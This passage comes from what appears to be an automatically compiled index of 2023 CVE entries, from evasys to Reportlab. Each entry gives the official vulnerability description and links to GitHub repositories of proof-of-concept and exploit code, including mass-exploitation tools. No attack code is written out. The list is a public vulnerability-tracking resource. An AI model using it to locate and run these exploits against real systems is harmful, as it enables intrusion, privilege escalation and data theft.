A SQL injection issue in Logbuch in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 allows authenticated attackers to execute SQL statements via the welche parameter.
- [trustcves/CVE-2023-31433](https://github.com/trustcves/CVE-2023-31433)
### CVE-2023-31434 (2023-05-02)
The parameters nutzer_titel, nutzer_vn, and nutzer_nn in the user profile, and langID and ONLINEID in direct links, in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 do not validate input, which allows authenticated attackers to inject HTML Code and XSS payloads in multiple locations.
- [trustcves/CVE-2023-31434](https://github.com/trustcves/CVE-2023-31434)
### CVE-2023-31435 (2023-05-02)
Multiple components (such as Onlinetemplate-Verwaltung, Liste aller Teilbereiche, Umfragen anzeigen, and questionnaire previews) in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 allow authenticated attackers to read and write to unauthorized data by accessing functions directly.
- [trustcves/CVE-2023-31435](https://github.com/trustcves/CVE-2023-31435)
### CVE-2023-31443
- [MaherAzzouzi/CVE-2023-31443](https://github.com/MaherAzzouzi/CVE-2023-31443)
### CVE-2023-31445 (2023-05-11)
Cassia Access controller before 2.1.1.2203171453, was discovered to have a unprivileged -information disclosure vulnerability that allows read-only users have the ability to enumerate all other users and discover e-mail addresses, phone numbers, and privileges of all other users.
- [Dodge-MPTC/CVE-2023-31445-Unprivileged-Information-Disclosure](https://github.com/Dodge-MPTC/CVE-2023-31445-Unprivileged-Information-Disclosure)
### CVE-2023-31446 (2024-01-10)
In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.
- [Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution](https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution)
### CVE-2023-31497 (2023-05-11)
Incorrect access control in Quick Heal Technologies Limited Seqrite Endpoint Security (EPS) all versions prior to v8.0 allows attackers to escalate privileges to root via supplying a crafted binary to the target system.
- [0xInfection/EPScalate](https://github.com/0xInfection/EPScalate)
### CVE-2023-31541 (2023-06-13)
A unrestricted file upload vulnerability was discovered in the ‘Browse and upload images’ feature of the CKEditor v1.2.3 plugin for Redmine, which allows arbitrary files to be uploaded to the server.
- [DreamD2v/CVE-2023-31541](https://github.com/DreamD2v/CVE-2023-31541)
### CVE-2023-31546 (2023-12-14)
Cross Site Scripting (XSS) vulnerability in DedeBIZ v6.0.3 allows attackers to run arbitrary code via the search feature.
- [ran9ege/CVE-2023-31546](https://github.com/ran9ege/CVE-2023-31546)
### CVE-2023-31584 (2023-05-22)
GitHub repository cu/silicon commit a9ef36 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the User Input field.
- [rootd4ddy/CVE-2023-31584](https://github.com/rootd4ddy/CVE-2023-31584)
### CVE-2023-31594 (2023-05-25)
IC Realtime ICIP-P2012T 2.420 is vulnerable to Incorrect Access Control via an exposed HTTP channel using VLC network.
- [Yozarseef95/CVE-2023-31594](https://github.com/Yozarseef95/CVE-2023-31594)
### CVE-2023-31595 (2023-05-24)
IC Realtime ICIP-P2012T 2.420 is vulnerable to Incorrect Access Control via unauthenticated port access.
- [Yozarseef95/CVE-2023-31595](https://github.com/Yozarseef95/CVE-2023-31595)
### CVE-2023-31606 (2023-06-06)
A Regular Expression Denial of Service (ReDoS) issue was discovered in the sanitize_html function of redcloth gem v4.0.0. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.
- [merbinr/CVE-2023-31606](https://github.com/merbinr/CVE-2023-31606)
### CVE-2023-31634 (2024-03-27)
In TeslaMate before 1.27.2, there is unauthorized access to port 4000 for remote viewing and operation of user data. After accessing the IP address for the TeslaMate instance, an attacker can switch the port to 3000 to enter Grafana for remote operations. At that time, the default username and password can be used to enter the Grafana management console without logging in, a related issue to CVE-2022-23126.
- [iSee857/CVE-2023-31634](https://github.com/iSee857/CVE-2023-31634)
### CVE-2023-31664 (2023-05-23)
A reflected cross-site scripting (XSS) vulnerability in /authenticationendpoint/login.do of WSO2 API Manager before 4.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tenantDomain parameter.
- [adilkhan7/CVE-2023-31664](https://github.com/adilkhan7/CVE-2023-31664)
### CVE-2023-31702 (2023-05-17)
SQL injection in the View User Profile in MicroWorld eScan Management Console 14.0.1400.2281 allows remote attacker to dump entire database and gain windows XP command shell to perform code execution on database server via GetUserCurrentPwd?UsrId=1.
- [sahiloj/CVE-2023-31702](https://github.com/sahiloj/CVE-2023-31702)
### CVE-2023-31703 (2023-05-17)
Cross Site Scripting (XSS) in the edit user form in Microworld Technologies eScan management console 14.0.1400.2281 allows remote attacker to inject arbitrary code via the from parameter.
- [sahiloj/CVE-2023-31703](https://github.com/sahiloj/CVE-2023-31703)
### CVE-2023-31704 (2023-07-13)
Sourcecodester Online Computer and Laptop Store 1.0 is vulnerable to Incorrect Access Control, which allows remote attackers to elevate privileges to the administrator's role.
- [d34dun1c02n/CVE-2023-31704](https://github.com/d34dun1c02n/CVE-2023-31704)
### CVE-2023-31705 (2023-07-13)
A Reflected Cross-site scripting (XSS) vulnerability in Sourcecodester Task Reminder System 1.0 allows an authenticated user to inject malicious javascript into the page parameter.
- [d34dun1c02n/CVE-2023-31705](https://github.com/d34dun1c02n/CVE-2023-31705)
### CVE-2023-31711
- [HritikThapa7/CVE-2023-31711](https://github.com/HritikThapa7/CVE-2023-31711)
### CVE-2023-31714 (2023-08-30)
Chitor-CMS before v1.1.2 was discovered to contain multiple SQL injection vulnerabilities.
- [msd0pe-1/CVE-2023-31714](https://github.com/msd0pe-1/CVE-2023-31714)
### CVE-2023-31716 (2023-09-21)
FUXA <= 1.1.12 has a Local File Inclusion vulnerability via file=fuxa.log
- [MateusTesser/CVE-2023-31716](https://github.com/MateusTesser/CVE-2023-31716)
### CVE-2023-31717 (2023-09-21)
A SQL Injection attack in FUXA <= 1.1.12 allows exfiltration of confidential information from the database.
- [MateusTesser/CVE-2023-31717](https://github.com/MateusTesser/CVE-2023-31717)
### CVE-2023-31718 (2023-09-21)
FUXA <= 1.1.12 is vulnerable to Local via Inclusion via /api/download.
- [MateusTesser/CVE-2023-31718](https://github.com/MateusTesser/CVE-2023-31718)
### CVE-2023-31719 (2023-09-21)
FUXA <= 1.1.12 is vulnerable to SQL Injection via /api/signin.
- [MateusTesser/CVE-2023-31719](https://github.com/MateusTesser/CVE-2023-31719)
### CVE-2023-31726 (2023-05-23)
AList 3.15.1 is vulnerable to Incorrect Access Control, which can be exploited by attackers to obtain sensitive information.
- [J6451/CVE-2023-31726](https://github.com/J6451/CVE-2023-31726)
### CVE-2023-31747 (2023-05-23)
Wondershare Filmora 12 (Build 12.2.1.2088) was discovered to contain an unquoted service path vulnerability via the component NativePushService. This vulnerability allows attackers to launch processes with elevated privileges.
- [msd0pe-1/CVE-2023-31747](https://github.com/msd0pe-1/CVE-2023-31747)
### CVE-2023-31753 (2023-07-20)
SQL injection vulnerability in diskusi.php in eNdonesia 8.7, allows an attacker to execute arbitrary SQL commands via the "rid=" parameter.
- [khmk2k/CVE-2023-31753](https://github.com/khmk2k/CVE-2023-31753)
### CVE-2023-31756 (2023-05-19)
A command injection vulnerability exists in the administrative web portal in TP-Link Archer VR1600V devices running firmware Versions <= 0.1.0. 0.9.1 v5006.0 Build 220518 Rel.32480n which allows remote attackers, authenticated to the administrative web portal as an administrator user to open an operating system level shell via the 'X_TP_IfName' parameter.
- [StanleyJobsonAU/LongBow](https://github.com/StanleyJobsonAU/LongBow)
### CVE-2023-31779 (2023-05-22)
Wekan v6.84 and earlier is vulnerable to Cross Site Scripting (XSS). An attacker with user privilege on kanban board can insert JavaScript code in in "Reaction to comment" feature.
- [jet-pentest/CVE-2023-31779](https://github.com/jet-pentest/CVE-2023-31779)
### CVE-2023-31851 (2023-07-17)
Cudy LT400 1.13.4 is has a cross-site scripting (XSS) vulnerability in /cgi-bin/luci/admin/network/wireless/status via the iface parameter.
- [CalfCrusher/CVE-2023-31851](https://github.com/CalfCrusher/CVE-2023-31851)
### CVE-2023-31852 (2023-07-17)
Cudy LT400 1.13.4 is vulnerable to Cross Site Scripting (XSS) in cgi-bin/luci/admin/network/wireless/config via the iface parameter.
- [CalfCrusher/CVE-2023-31852](https://github.com/CalfCrusher/CVE-2023-31852)
### CVE-2023-31853 (2023-07-17)
Cudy LT400 1.13.4 is vulnerable Cross Site Scripting (XSS) in /cgi-bin/luci/admin/network/bandwidth via the icon parameter.
- [CalfCrusher/CVE-2023-31853](https://github.com/CalfCrusher/CVE-2023-31853)
### CVE-2023-32031 (2023-06-14)
Microsoft Exchange Server Remote Code Execution Vulnerability
- [Avento/CVE-2023-32031](https://github.com/Avento/CVE-2023-32031)
### CVE-2023-32073 (2023-05-12)
WWBN AVideo is an open source video platform. In versions 12.4 and prior, a command injection vulnerability exists at `plugin/CloneSite/cloneClient.json.php` which allows Remote Code Execution if you CloneSite Plugin. This is a bypass to the fix for CVE-2023-30854, which affects WWBN AVideo up to version 12.3. This issue is patched in commit 1df4af01f80d56ff2c4c43b89d0bac151e7fb6e3.
- [jmrcsnchz/CVE-2023-32073](https://github.com/jmrcsnchz/CVE-2023-32073)
### CVE-2023-32117
- [RandomRobbieBF/CVE-2023-32117](https://github.com/RandomRobbieBF/CVE-2023-32117)
### CVE-2023-32162 (2023-09-06)
Wacom Drivers for Windows Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Wacom Drivers for Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the WacomInstallI.txt file by the PrefUtil.exe utility. The issue results from incorrect permissions on the WacomInstallI.txt file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-16318.
- [LucaBarile/ZDI-CAN-16318](https://github.com/LucaBarile/ZDI-CAN-16318)
### CVE-2023-32163 (2023-09-06)
Wacom Drivers for Windows Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Wacom Drivers for Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Tablet Service. By creating a symbolic link, an attacker can abuse the service to create a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-16857.
- [LucaBarile/ZDI-CAN-16857](https://github.com/LucaBarile/ZDI-CAN-16857)
### CVE-2023-32233 (2023-05-08)
In the Linux kernel through 6.3.1, a use-after-free in Netfilter nf_tables when processing batch requests can be abused to perform arbitrary read and write operations on kernel memory. Unprivileged local users can obtain root privileges. This occurs because anonymous sets are mishandled.
- [PIDAN-HEIDASHUAI/CVE-2023-32233](https://github.com/PIDAN-HEIDASHUAI/CVE-2023-32233)
- [Liuk3r/CVE-2023-32233](https://github.com/Liuk3r/CVE-2023-32233)
- [oferchen/POC-CVE-2023-32233](https://github.com/oferchen/POC-CVE-2023-32233)
- [RogelioPumajulca/TEST-CVE-2023-32233](https://github.com/RogelioPumajulca/TEST-CVE-2023-32233)
- [void0red/CVE-2023-32233](https://github.com/void0red/CVE-2023-32233)
### CVE-2023-32235 (2023-05-05)
Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.
- [AXRoux/Ghost-Path-Traversal-CVE-2023-32235-](https://github.com/AXRoux/Ghost-Path-Traversal-CVE-2023-32235-)
### CVE-2023-32243 (2023-05-12)
Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.
- [little44n1o/cve-2023-32243](https://github.com/little44n1o/cve-2023-32243)
- [gbrsh/CVE-2023-32243](https://github.com/gbrsh/CVE-2023-32243)
- [RandomRobbieBF/CVE-2023-32243](https://github.com/RandomRobbieBF/CVE-2023-32243)
- [manavvedawala2/CVE-2023-32243-POC](https://github.com/manavvedawala2/CVE-2023-32243-POC)
- [manavvedawala2/CVE-2023-32243-proof-of-concept](https://github.com/manavvedawala2/CVE-2023-32243-proof-of-concept)
- [YouGina/CVE-2023-32243](https://github.com/YouGina/CVE-2023-32243)
- [thatonesecguy/Wordpress-Vulnerability-Identification-Scripts](https://github.com/thatonesecguy/Wordpress-Vulnerability-Identification-Scripts)
- [manavvedawala/CVE-2023-32243-proof-of-concept](https://github.com/manavvedawala/CVE-2023-32243-proof-of-concept)
- [Jenderal92/WP-CVE-2023-32243](https://github.com/Jenderal92/WP-CVE-2023-32243)
- [shaoyu521/Mass-CVE-2023-32243](https://github.com/shaoyu521/Mass-CVE-2023-32243)
### CVE-2023-32314 (2023-05-15)
vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.
- [AdarkSt/Honeypot_Smart_Infrastructure](https://github.com/AdarkSt/Honeypot_Smart_Infrastructure)
### CVE-2023-32315 (2023-05-26)
Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice.
- [ohnonoyesyes/CVE-2023-32315](https://github.com/ohnonoyesyes/CVE-2023-32315)
- [tangxiaofeng7/CVE-2023-32315-Openfire-Bypass](https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass)
- [5rGJ5aCh5oCq5YW9/CVE-2023-32315exp](https://github.com/5rGJ5aCh5oCq5YW9/CVE-2023-32315exp)
- [miko550/CVE-2023-32315](https://github.com/miko550/CVE-2023-32315)
- [ThatNotEasy/CVE-2023-32315](https://github.com/ThatNotEasy/CVE-2023-32315)
- [izzz0/CVE-2023-32315-POC](https://github.com/izzz0/CVE-2023-32315-POC)
- [gibran-abdillah/CVE-2023-32315](https://github.com/gibran-abdillah/CVE-2023-32315)
- [CN016/Openfire-RCE-CVE-2023-32315-](https://github.com/CN016/Openfire-RCE-CVE-2023-32315-)
- [K3ysTr0K3R/CVE-2023-32315-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT)
- [bryanqb07/CVE-2023-32315](https://github.com/bryanqb07/CVE-2023-32315)
### CVE-2023-32353 (2023-06-23)
A logic issue was addressed with improved checks. This issue is fixed in iTunes 12.12.9 for Windows. An app may be able to elevate privileges.
- [86x/CVE-2023-32353-PoC](https://github.com/86x/CVE-2023-32353-PoC)
### CVE-2023-32364 (2023-07-27)
A logic issue was addressed with improved restrictions. This issue is fixed in macOS Ventura 13.5. A sandboxed process may be able to circumvent sandbox restrictions.
- [gergelykalman/CVE-2023-32364-macos-app-sandbox-escape](https://github.com/gergelykalman/CVE-2023-32364-macos-app-sandbox-escape)
### CVE-2023-32407 (2023-06-23)
A logic issue was addressed with improved state management. This issue is fixed in watchOS 9.5, tvOS 16.5, macOS Ventura 13.4, iOS 15.7.6 and iPadOS 15.7.6, macOS Big Sur 11.7.7, macOS Monterey 12.6.6, iOS 16.5 and iPadOS 16.5. An app may be able to bypass Privacy preferences.
- [gergelykalman/CVE-2023-32407-a-macOS-TCC-bypass-in-Metal](https://github.com/gergelykalman/CVE-2023-32407-a-macOS-TCC-bypass-in-Metal)
### CVE-2023-32422 (2023-06-23)
This issue was addressed by adding additional SQLite logging restrictions. This issue is fixed in iOS 16.5 and iPadOS 16.5, tvOS 16.5, macOS Ventura 13.4. An app may be able to bypass Privacy preferences.
- [gergelykalman/CVE-2023-32422-a-macOS-TCC-bypass-in-sqlite](https://github.com/gergelykalman/CVE-2023-32422-a-macOS-TCC-bypass-in-sqlite)
### CVE-2023-32560 (2023-08-10)
An attacker can send a specially crafted message to the Wavelink Avalanche Manager, which could result in service disruption or arbitrary code execution.\n\nThanks to a Researcher at Tenable for finding and reporting.\n\nFixed in version 6.4.1.
- [x0rb3l/CVE-2023-32560](https://github.com/x0rb3l/CVE-2023-32560)
- [idkwastaken/CVE-2023-32560](https://github.com/idkwastaken/CVE-2023-32560)
### CVE-2023-32571 (2023-06-22)
Dynamic Linq 1.0.7.10 through 1.2.25 before 1.3.0 allows attackers to execute arbitrary code and commands when untrusted input to methods including Where, Select, OrderBy is parsed.
- [Tris0n/CVE-2023-32571-POC](https://github.com/Tris0n/CVE-2023-32571-POC)
- [vert16x/CVE-2023-32571-POC](https://github.com/vert16x/CVE-2023-32571-POC)
### CVE-2023-32629 (2023-07-26)
Local privilege escalation vulnerability in Ubuntu Kernels overlayfs ovl_copy_up_meta_inode_data skip permission checks when calling ovl_do_setxattr on Ubuntu kernels
- [kaotickj/Check-for-CVE-2023-32629-GameOver-lay](https://github.com/kaotickj/Check-for-CVE-2023-32629-GameOver-lay)
- [ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation](https://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation)
- [k4but0/Ubuntu-LPE](https://github.com/k4but0/Ubuntu-LPE)
- [xS9NTX/CVE-2023-32629-CVE-2023-2640-Ubuntu-Privilege-Escalation-POC](https://github.com/xS9NTX/CVE-2023-32629-CVE-2023-2640-Ubuntu-Privilege-Escalation-POC)
### CVE-2023-32681 (2023-05-26)
Requests is a HTTP library. Since Requests 2.3.0, Requests has been leaking Proxy-Authorization headers to destination servers when redirected to an HTTPS endpoint. This is a product of how we use `rebuild_proxies` to reattach the `Proxy-Authorization` header to requests. For HTTP connections sent through the tunnel, the proxy will identify the header in the request itself and remove it prior to forwarding to the destination server. However when sent over HTTPS, the `Proxy-Authorization` header must be sent in the CONNECT request as the proxy has no visibility into the tunneled request. This results in Requests forwarding proxy credentials to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate sensitive information. This issue has been patched in version 2.31.0.\n\n
- [hardikmodha/POC-CVE-2023-32681](https://github.com/hardikmodha/POC-CVE-2023-32681)
### CVE-2023-32707 (2023-06-01)
In versions of Splunk Enterprise below 9.0.5, 8.2.11, and 8.1.14, and Splunk Cloud Platform below version 9.0.2303.100, a low-privileged user who holds a role that has the ‘edit_user’ capability assigned to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
- [9xN/CVE-2023-32707](https://github.com/9xN/CVE-2023-32707)
### CVE-2023-32749 (2023-06-08)
Pydio Cells allows users by default to create so-called external users in order to share files with them. By modifying the HTTP request sent when creating such an external user, it is possible to assign the new user arbitrary roles. By assigning all roles to a newly created user, access to all cells and non-personal workspaces is granted.
- [xcr-19/CVE-2023-32749](https://github.com/xcr-19/CVE-2023-32749)
### CVE-2023-32784 (2023-05-15)
In KeePass 2.x before 2.54, it is possible to recover the cleartext master password from a memory dump, even when a workspace is locked or no longer running. The memory dump can be a KeePass process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system. The first character cannot be recovered. In 2.54, there is different API usage and/or random string insertion for mitigation.
- [vdohney/keepass-password-dumper](https://github.com/vdohney/keepass-password-dumper)
- [CTM1/CVE-2023-32784-keepass-linux](https://github.com/CTM1/CVE-2023-32784-keepass-linux)
- [und3sc0n0c1d0/BruteForce-to-KeePass](https://github.com/und3sc0n0c1d0/BruteForce-to-KeePass)
- [z-jxy/keepass_dump](https://github.com/z-jxy/keepass_dump)
- [LeDocteurDesBits/cve-2023-32784](https://github.com/LeDocteurDesBits/cve-2023-32784)
- [hau-zy/KeePass-dump-py](https://github.com/hau-zy/KeePass-dump-py)
- [dawnl3ss/CVE-2023-32784](https://github.com/dawnl3ss/CVE-2023-32784)
- [le01s/poc-CVE-2023-32784](https://github.com/le01s/poc-CVE-2023-32784)
- [mister-turtle/cve-2023-32784](https://github.com/mister-turtle/cve-2023-32784)
- [Cmadhushanka/CVE-2023-32784-Exploitation](https://github.com/Cmadhushanka/CVE-2023-32784-Exploitation)
### CVE-2023-32961 (2023-06-12)
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Katie Seaborn Zotpress plugin <= 7.3.3 versions.
- [LOURC0D3/CVE-2023-32961](https://github.com/LOURC0D3/CVE-2023-32961)
### CVE-2023-33105 (2024-03-04)
Transient DOS in WLAN Host and Firmware when large number of open authentication frames are sent with an invalid transaction sequence number.
- [D3adP3nguin/CVE-2023-33105-Transient-DOS-in-WLAN-Host-and-Firmware](https://github.com/D3adP3nguin/CVE-2023-33105-Transient-DOS-in-WLAN-Host-and-Firmware)
### CVE-2023-33242 (2023-08-09)
Crypto wallets implementing the Lindell17 TSS protocol might allow an attacker to extract the full ECDSA private key by exfiltrating a single bit in every signature attempt (256 in total) because of not adhering to the paper's security proof's assumption regarding handling aborts after a failed signature.
- [d0rb/CVE-2023-33242](https://github.com/d0rb/CVE-2023-33242)
### CVE-2023-33243 (2023-06-15)
RedTeam Pentesting discovered that the web interface of STARFACE as well as its REST API allows authentication using the SHA512 hash of the password instead of the cleartext password. While storing password hashes instead of cleartext passwords in an application's database generally has become best practice to protect users' passwords in case of a database compromise, this is rendered ineffective when allowing to authenticate using the password hash.
- [RedTeamPentesting/CVE-2023-33243](https://github.com/RedTeamPentesting/CVE-2023-33243)
### CVE-2023-33246 (2023-05-24)
For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. \n\nSeveral components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. \n\nTo prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n\n\n\n\n\n\n\n\n\n\n\n
- [I5N0rth/CVE-2023-33246](https://github.com/I5N0rth/CVE-2023-33246)
- [4mazing/CVE-2023-33246-Copy](https://github.com/4mazing/CVE-2023-33246-Copy)
- [Le1a/CVE-2023-33246](https://github.com/Le1a/CVE-2023-33246)
- [SuperZero/CVE-2023-33246](https://github.com/SuperZero/CVE-2023-33246)
- [Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT](https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT)
- [3yujw7njai/CVE-2023-33246](https://github.com/3yujw7njai/CVE-2023-33246)
- [Devil0ll/CVE-2023-33246](https://github.com/Devil0ll/CVE-2023-33246)
- [d0rb/CVE-2023-33246](https://github.com/d0rb/CVE-2023-33246)
- [vulncheck-oss/fetch-broker-conf](https://github.com/vulncheck-oss/fetch-broker-conf)
- [0xKayala/CVE-2023-33246](https://github.com/0xKayala/CVE-2023-33246)
- [MkJos/CVE-2023-33246_RocketMQ_RCE_EXP](https://github.com/MkJos/CVE-2023-33246_RocketMQ_RCE_EXP)
- [hanch7274/CVE-2023-33246](https://github.com/hanch7274/CVE-2023-33246)
- [PavilionQ/CVE-2023-33246-mitigation](https://github.com/PavilionQ/CVE-2023-33246-mitigation)
### CVE-2023-33253 (2023-06-12)
LabCollector 6.0 though 6.15 allows remote code execution. An authenticated remote low-privileged user can upload an executable PHP file and execute system commands. The vulnerability is in the message function, and is due to insufficient validation of the file (such as shell.jpg.php.shell) being sent.
- [Toxich4/CVE-2023-33253](https://github.com/Toxich4/CVE-2023-33253)
### CVE-2023-33264 (2023-05-22)
In Hazelcast through 5.0.4, 5.1 through 5.1.6, and 5.2 through 5.2.3, configuration routines don't mask passwords in the member configuration properly. This allows Hazelcast Management Center users to view some of the secrets.
- [miguelc49/CVE-2023-33264-2](https://github.com/miguelc49/CVE-2023-33264-2)
- [miguelc49/CVE-2023-33264-1](https://github.com/miguelc49/CVE-2023-33264-1)
- [miguelc49/CVE-2023-33264-3](https://github.com/miguelc49/CVE-2023-33264-3)
### CVE-2023-33381 (2023-06-06)
A command injection vulnerability was found in the ping functionality of the MitraStar GPT-2741GNAC router (firmware version AR_g5.8_110WVN0b7_2). The vulnerability allows an authenticated user to execute arbitrary OS commands by sending specially crafted input to the router via the ping function.
- [duality084/CVE-2023-33381-MitraStar-GPT-2741GNAC](https://github.com/duality084/CVE-2023-33381-MitraStar-GPT-2741GNAC)
### CVE-2023-33404 (2023-06-26)
An Unrestricted Upload vulnerability, due to insufficient validation on UploadControlled.cs file, in BlogEngine.Net version 3.3.8.0 and earlier allows remote attackers to execute remote code.
- [hacip/CVE-2023-33404](https://github.com/hacip/CVE-2023-33404)
### CVE-2023-33405 (2023-06-21)
Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect.
- [hacip/CVE-2023-33405](https://github.com/hacip/CVE-2023-33405)
### CVE-2023-33408 (2023-06-05)
Minical 1.0.0 is vulnerable to Cross Site Scripting (XSS). The vulnerability exists due to insufficient input validation in the application's user input handling in the security_helper.php file.
- [Thirukrishnan/CVE-2023-33408](https://github.com/Thirukrishnan/CVE-2023-33408)
### CVE-2023-33409 (2023-06-05)
Minical 1.0.0 is vulnerable to Cross Site Request Forgery (CSRF) via minical/public/application/controllers/settings/company.php.
- [Thirukrishnan/CVE-2023-33409](https://github.com/Thirukrishnan/CVE-2023-33409)
### CVE-2023-33410 (2023-06-05)
Minical 1.0.0 and earlier contains a CSV injection vulnerability which allows an attacker to execute remote code. The vulnerability exists due to insufficient input validation on the Customer Name field in the Accounting module that is used to construct a CSV file.
- [Thirukrishnan/CVE-2023-33410](https://github.com/Thirukrishnan/CVE-2023-33410)
### CVE-2023-33476 (2023-06-02)
ReadyMedia (MiniDLNA) versions from 1.1.15 up to 1.3.2 is vulnerable to Buffer Overflow. The vulnerability is caused by incorrect validation logic when handling HTTP requests using chunked transport encoding. This results in other code later using attacker-controlled chunk values that exceed the length of the allocated buffer, resulting in out-of-bounds read/write.
- [mellow-hype/cve-2023-33476](https://github.com/mellow-hype/cve-2023-33476)
### CVE-2023-33477 (2023-06-06)
In Harmonic NSG 9000-6G devices, an authenticated remote user can obtain source code by directly requesting a special path.
- [Skr11lex/CVE-2023-33477](https://github.com/Skr11lex/CVE-2023-33477)
### CVE-2023-33517 (2023-10-23)
carRental 1.0 is vulnerable to Incorrect Access Control (Arbitrary File Read on the Back-end System).
- [wushigudan/CVE-2023-33517](https://github.com/wushigudan/CVE-2023-33517)
### CVE-2023-33580 (2023-06-26)
Phpgurukul Student Study Center Management System V1.0 is vulnerable to Cross Site Scripting (XSS) in the "Admin Name" field on Admin Profile page.
- [sudovivek/My-CVE](https://github.com/sudovivek/My-CVE)
### CVE-2023-33592 (2023-06-28)
Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information.
- [ChineseOldboy/CVE-2023-33592](https://github.com/ChineseOldboy/CVE-2023-33592)
### CVE-2023-33617 (2023-05-23)
An OS Command Injection vulnerability in Parks Fiberlink 210 firmware version V2.1.14_X000 was found via the /boaform/admin/formPing target_addr parameter.
- [Chocapikk/CVE-2023-33617](https://github.com/Chocapikk/CVE-2023-33617)
- [tucommenceapousser/CVE-2023-33617](https://github.com/tucommenceapousser/CVE-2023-33617)
### CVE-2023-33668 (2023-07-12)
DigiExam up to v14.0.2 lacks integrity checks for native modules, allowing attackers to access PII and takeover accounts on shared computers.
- [lodi-g/CVE-2023-33668](https://github.com/lodi-g/CVE-2023-33668)
### CVE-2023-33669 (2023-06-02)
Tenda AC8V4.0-V16.03.34.06 was discovered to contain a stack overflow via the timeZone parameter in the sub_44db3c function.
- [retr0reg/tenda-ac8v4-rop](https://github.com/retr0reg/tenda-ac8v4-rop)
- [Mohammaddvd/CVE-2023-33669](https://github.com/Mohammaddvd/CVE-2023-33669)
### CVE-2023-33730 (2023-05-31)
Privilege Escalation in the "GetUserCurrentPwd" function in Microworld Technologies eScan Management Console 14.0.1400.2281 allows any remote attacker to retrieve password of any admin or normal user in plain text format.
- [sahiloj/CVE-2023-33730](https://github.com/sahiloj/CVE-2023-33730)
### CVE-2023-33731 (2023-06-02)
Reflected Cross Site Scripting (XSS) in the view dashboard detail feature in Microworld Technologies eScan management console 14.0.1400.2281 allows remote attacker to inject arbitrary code via the URL directly.
- [sahiloj/CVE-2023-33731](https://github.com/sahiloj/CVE-2023-33731)
### CVE-2023-33732 (2023-05-31)
Cross Site Scripting (XSS) in the New Policy form in Microworld Technologies eScan management console 14.0.1400.2281 allows a remote attacker to inject arbitrary code via the vulnerable parameters type, txtPolicyType, and Deletefileval.
- [sahiloj/CVE-2023-33732](https://github.com/sahiloj/CVE-2023-33732)
### CVE-2023-33733 (2023-06-05)
Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file.
- [c53elyas/CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733)
- [hoangbui24/CVE-2023-33733](https://github.com/hoangbui24/CVE-2023-33733)
- [onion2203/Lab_Reportlab](https://github.com/onion2203/Lab_Reportlab)
- [buiduchoang24/CVE-2023-33733](https://github.com/buiduchoang24/CVE-2023-33733)
- [L41KAA/CVE-2023-33733-Exploit-PoC](https://github.com/L41KAA/CVE-2023-33733-Exploit-PoC)
### CVE-2023-33747 (2023-06-06)
